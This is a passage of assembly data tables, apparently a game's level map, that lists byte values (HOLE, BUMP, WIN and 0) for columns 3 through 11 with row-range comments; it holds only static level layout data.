dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP ; 180-161 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE Column3Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b BUMP dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column4Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b BUMP ; 60-41 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column5Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column6Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN ; 60-41 dc.b WIN dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP ; 160-141 dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column7Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN ; 60-41 dc.b WIN dc.b WIN dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column8Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN ; 60-41 dc.b WIN dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column9Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column10Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column11Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE 